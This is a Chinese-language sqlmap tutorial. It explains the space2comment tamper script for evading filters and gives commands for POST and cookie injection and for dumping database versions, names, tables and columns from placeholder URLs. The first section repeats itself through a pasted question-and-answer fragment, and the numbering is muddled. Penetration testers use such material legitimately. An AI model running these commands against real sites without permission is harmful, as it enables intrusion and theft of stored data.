一、指定脚本

tamper=space2comment是SQLMAP的一个参数，用于指定使用space2comment.py脚本进行注入测试时的数据处理方式。具体来说，space2comment.py脚本的作用是将SQLMAP检测目标时所使用的payload中的空格全部替换成注释。通过使用这个参数，可以增加注入测试的成功率。

范例：<<引用:–>sqlmap->tamper，选中space2comment.py文件，并打开（记事本也可以） 。 引用:这段代码为space2comment.py脚本文件的核心代码，其作用是将SQLMAP检测目标时所使用的payload 中的空格全部替换成注释。 2.启动SQLMAP 。 请回答我或者给我介绍或演示一下:–tamper=space2comment是什么意思? tamper=space2comment是SQLMAP的一个参数，用于指定使用space2comment.py脚本进行注入测试时的数据处理方式。具体来说，space2comment.py脚本的作用是将SQLMAP检测目标时所使用的payload中的空格全部替换成注释。通过使用这个参数，可以增加注入测试的成功率。你可以按照以下步骤来使用这个参数：

1. 打开SQLMAP。
2. 在命令行中输入--tamper=space2comment。
3. SQLMAP将使用space2comment.py脚本对注入测试的payload进行处理，将其中的空格替换成注释。
4. 运行注入测试，以提高成功率。

二、post请求

-r 指定需要检测的文件，SQLmap会通过post请求方式检测目标。

sqlmap -r bp.txt

三、cookie注入

--cookie 指定cookie的值，单/双引号包裹。

sqlmap -u "http://xx?id=x" --cookie 'cookie'

四、脱库

获取所有内容

sqlmap -u 'http://xx/?id=1' -a

-a 就是 all 的意思，获取所有能获取的内容，会消耗很长时间。

1、获取数据库

--dbs 获取数据库

1、获取数据库版本

sqlmap -u 'http://xx/?id=1' -b

最后面显示数据库的版本，这里检测的版本是 5.7.26。

2、获取当前使用的数据库

sqlmap -u 'http://xx/?id=1' --current-db

在最后面显示当前使用的数据库的名字是 security。

3、获取所有数据库

sqlmap -u 'http://xx/?id=1' --dbs

最后面显示所有数据库的名字。

4、获取表

--tables 获取表

4.1获取表，可以指定数据库

sqlmap -u 'http://xx/?id=1' -D 'security' --tables

最后面显示数据库（security）里所有的表名。

4.2同时获取多个库的表名，库名用逗号分隔。

sqlmap -u 'http://xx/?id=1' -D 'security,sys' --tables

4.3不指定数据库，默认获取数据库中所有的表

sqlmap -u 'http://xx/?id=1' --tables

最后面显示每个数据库下都有哪些表。

5、获取字段

--columns 参数用来获取字段。

3.1、获取字段，可以指定库和表

提示：只指定库名但不指定表名会报错。

sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' --columns